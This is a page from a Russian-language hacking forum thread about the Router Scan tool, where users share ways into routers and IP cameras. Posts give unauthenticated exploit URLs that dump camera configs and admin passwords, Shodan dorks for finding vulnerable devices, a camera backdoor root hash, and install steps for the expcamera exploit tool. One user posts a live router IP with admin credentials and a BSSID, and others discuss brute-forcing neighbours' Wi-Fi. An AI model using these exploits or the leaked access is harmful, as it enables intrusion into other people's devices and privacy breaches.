прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    650
    Likes Received:
    937
    Reputations:
    7
    Снизьте количество потоков сканирования до приемлемого уровня вашего канала/магистрали.
    Если пошли таймауты, где то по пути "узкие места". Не гонитесь за барышом, :) мы никуда не торопимся. Гораздо обиднее недопарс.
     
    Piligrim740, binarymaster and sha9 like this.
  2. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    если ты про то что пропал интернет там другая при чина, хотя пока даже был интернет были time aut, ели это то как снизить количество потоков
     
  3. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    560
    Likes Received:
    725
    Reputations:
    2
    вообще-то не я. @ania01. а я просто пробил по 2ip
     
  4. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    560
    Likes Received:
    725
    Reputations:
    2
    для любителей

    эксплойт на камеру MESSOA NIC990. он-же подходит и на некоторые SIEMENS и тошиба
    MESSOA NIC990 IP-Camera auth bypass configuration download

    http://TARGET/cgi-bin/chklogin.cgi?file=config.ini

    shodan dork : /cgi-bin/chklogin.cgi
    на шодане правда нашел на скорую руку только сименсы. месоа не попались

    искомые параметры в строке USERID
    он правда старенький,но еще актуальный :)



    эксплойт на камеры Vanderbilt

    http://host:port/cgi-bin/readfile.cgi?query=ADMINID
    возвращает пас и логин админа
    шодан дорк: title:"Vanderbilt IP-Camera"
     
    #6304 sha9, 2 Aug 2018
    Last edited: 2 Aug 2018
    Ossen likes this.
  5. sharam

    sharam New Member

    Joined:
    2 Aug 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Это нормально что у меня сайт не грузит а через vpn грузит
     
  6. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    650
    Likes Received:
    937
    Reputations:
    7
    Так.
    Всем неравнодушным скинутся на клонирование binarymaster , но что бы клоны были с прошивкой подчиняющейся сорцу(и без уязвимостей перехвата управления). :D
    Дабы, они все не подняли восстание против исходного человека.
    Тогда он(настоящий binarymaster ) наконец будет за всем поспевать, и выпустит релиз.
    И мы ему .. ещё работы накидаем! :D
     
  7. Terrifier

    Terrifier Member

    Joined:
    2 Aug 2018
    Messages:
    52
    Likes Received:
    59
    Reputations:
    0
    Соседские роутеры перекрывают собственный сигнал на 2.4
    Ходил просил поменять каналы/снизить мощность сигнала- безуспешно.
    Приходится самому....
    Подскажите, что можно сделать? может посмотреть где-то словари для брута данных моделей?
    [​IMG]
    [​IMG]
     
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,289
    Likes Received:
    8,549
    Reputations:
    113
    Обычно пароль совпадает с WPS PIN. Брутить можно по соответствующему словарю.
     
    stuz0r and sha9 like this.
  9. Terrifier

    Terrifier Member

    Joined:
    2 Aug 2018
    Messages:
    52
    Likes Received:
    59
    Reputations:
    0
    Благодарю.
    WPS от модели не зависит, получается?

    И именно брутить или же использовать "Obtain key with WPS"?
     
  10. trew911

    trew911 New Member

    Joined:
    25 Oct 2016
    Messages:
    65
    Likes Received:
    0
    Reputations:
    0
    какие ещё порты могут использовать роутеры ? в нашем городе просканил весь город и что то мало результатов(

    Тюмень

    80
    8080
    1080
    443
    445
    554
    8000
    23
    53
     
  11. Payer

    Payer Elder - Старейшина

    Joined:
    14 May 2010
    Messages:
    871
    Likes Received:
    3,561
    Reputations:
    49
    На сайте http://3wifi.stascorp.com/stat есть статистика топ30 портов, на которых исследованы роутеры.
    А теперь внимание, вопрос: :D
    Какие еще порты можно использовать? Кроме пяти используемых вами.
     
    Kakoluk and sha9 like this.
  12. Pirnazar

    Pirnazar Active Member

    Joined:
    28 Apr 2018
    Messages:
    144
    Likes Received:
    128
    Reputations:
    5
    Какие exploit-и использует RouterScan?
    Можно ли добавить свои?
     
    #6312 Pirnazar, 3 Aug 2018
    Last edited: 3 Aug 2018
  13. Puppet_Master

    Puppet_Master New Member

    Joined:
    2 Aug 2018
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Заметил, что роутеры на RouterOS, взламываются нормально, но в гуды их не кидает.
     
    miroslavvv likes this.
  14. Puppet_Master

    Puppet_Master New Member

    Joined:
    2 Aug 2018
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Мне на 161 попадаются, немного, но они есть.
     
    #6314 Puppet_Master, 3 Aug 2018
    Last edited: 3 Aug 2018
  15. sIm_sIm

    sIm_sIm New Member

    Joined:
    3 Aug 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Если есть возможность, прошу сделать альтернативу для скачивания Router Scan-а. Уже который день не могу скачать ни с офф.сайта, ни с Яндекс-диска. Буду очень признателен.
     
  16. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    560
    Likes Received:
    725
    Reputations:
    2
    сорри за маленький офтоп...
    хорошее дополнение к роутерскану. для тех кто дружит с линуксом и не тыкает тупо на кнопки :) позволяет тестировать видеокамеры - expcamera.
    https://github.com/vanpersiexp/expcamera

    вторичный источник https://darkwebs.ws/threads/63210/


    Известны многие уязвимости видеокамер , которые делают последние доступными.
    При благополучном исходе , их закрывают и разрабатывают патчи.
    Но не в этом случае.

    Вы не ослышались , некоторые уязвимости до сих пор носят гордое звание 0 day.
    Почему так получилось? Ставили конечно в известность производителей.Ответа не получили.
    Да , многие модели вебок сюда тоже попадают.

    "После меня - хоть потоп"-Людовик 15
    (Главное продажи,пока показатели неплохи,продаём , пока есть спрос)
    " Я бы продал даже Лондон,если бы нашёлся покупатель"- Ричард Львиное Сердце

    И покупатели действительно находятся , только китайская школа пошла дальше.
    И заложила в инструмент эксплуатацию множества уязвимостей:

    1) Уязвимость Backdoor Account (CNVD-2017-02751)
    По умолчанию используется Telnet.
    Любой пользователь может получить доступ к логину с помощью следующих паролей учетной записи:
    Код:
    root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh
    2) Уязвимости RSA и раскрытия сертификата (CNVD-2017-02773)
    Код:
    /system/www/pem/ck.pem _здесь_содержимое_частных_ключей RSA Apple certificate
    3) Информация о предварительной авторизации и уязвимость утечки учётных данных(CNVD-2017-02774)

    При доступе к файлу конфигурации сервера путем предоставления пустых параметров ?loginuse? и ?loginpas?,
    злоумышленник может обойти программу аутентификации устройства.
    Таким образом , возможно загрузить файл конфигурации устройства без входа в систему.
    Эти файлы конфигурации содержат учетную информацию устройства , а также содержимое учетной записи FTP и SMTP.

    4) Уязвимость удаленного выполнения команды (CNVD-2017-02775)
    Она существует в inset_ftp.cgi в интерфейсе общего интерфейса FTP (CGI).
    Злоумышленник использует идентификатор администратора ftp
    для выполнения удаленной команды и дальнейшего получения прав root на сетевом устройстве.

    5) Удалённый доступ (CNVD-2017-02776)

    Получая доступ к URL-ссылке со специальными параметрами,
    злоумышленник может обойти программу проверки подлинности
    с полномочиями пользователя root и выполнить различный код в управлении видеокамеры.

    6) Уязвимость несанкционированного доступа CNVD-2017-02777) - содержательно звучит конечно,но ,тем ,не менее-
    Злоумышленник может получить доступ к встроенному серверу RTSP камеры через порт 10554
    и смотреть видео в реальном времени без проверки подлинности.

    7) Уязвимости функционального дизайна ‘Cloud’(CNVD-2017-02778)
    Функция, которая включена по умолчанию , позволяет потребителям использовать устройство в управлении сетью.
    Эта функция использует текстовые туннели UDP для обхода NAT и брандмауэров.
    Злоумышленник может злоупотреблять этой функцией, чтобы начать атаку грубой силы
    (brute-force attacks)

    В общем , более 1200 моделей различных видов продукции на рынке страдают от лазеек.
    Единственный совет на текущее время-отключить устройство от интернета.
    Здорово , Господа , не так ли ? Мне тоже нравится.

    Отступаем от лирики и переходим к сути.

    Автор замечательного инструмента,который позволяет тестировать видеокамеры-vanpersiexp
    Называется он expcamera.
    Как установить:

    Код:
    git clone https://github.com/vanpersiexp/expcamera.git
    cd Expcamera/
    chmod exploit_camera.py
    python exploit_camera.py -h -запуск с выводом опций
    ./exploit_camera.py -h -можно и так запустить.


    Я работал на Arch Linux , для остальных дистрибутивов возможно потребуется пакет python3
    И с ним же производим запуск в таком случае.

    Опции можно видеть на скрине.
    Предлагаю ознакомиться с ними самостоятельно.
     
    #6316 sha9, 3 Aug 2018
    Last edited: 3 Aug 2018
    Puppet_Master likes this.
  17. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,289
    Likes Received:
    8,549
    Reputations:
    113
    Значит у вас генерация гудов так настроена, либо отключена вовсе.
    Документацию читай, там есть ответ на оба вопроса.
    Зависит от прошивки, а она на некоторых моделях не сильно отличается.
    Под брутом обычно подразумевается оффлайн брут пойманного хендшейка.
     
    sha9 likes this.
  18. EKB_VIZ

    EKB_VIZ New Member

    Joined:
    24 Jul 2018
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Нашел такой роутер.
    Address: http://46.163.148.83/
    Authorization: Admin:Admin
    Device: Wive-NG (firmware: 6.4.10.RU.27082017)
    BSSID: F8:F0:82:2F:CB:2C

    RouterScan вытащить не может инфу. А инфа в скачивается по кнопке...
    Прикрутить можно вытаскивание настроек?
    Там просто прошивка альтернативная, от продавца... Смотрите сами
     
  19. EKB_VIZ

    EKB_VIZ New Member

    Joined:
    24 Jul 2018
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    А если самому на другой канал уйти?
    Мне кажется это радикально - зайти к соседям и им каналы поменять :)
     
  20. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    560
    Likes Received:
    725
    Reputations:
    2
    такие вещи в личку нужно автору. вы в курсе, что его уже перекрыли из-за наплыва любопытствующих?
     
    Ossen and Kakoluk like this.
Loading...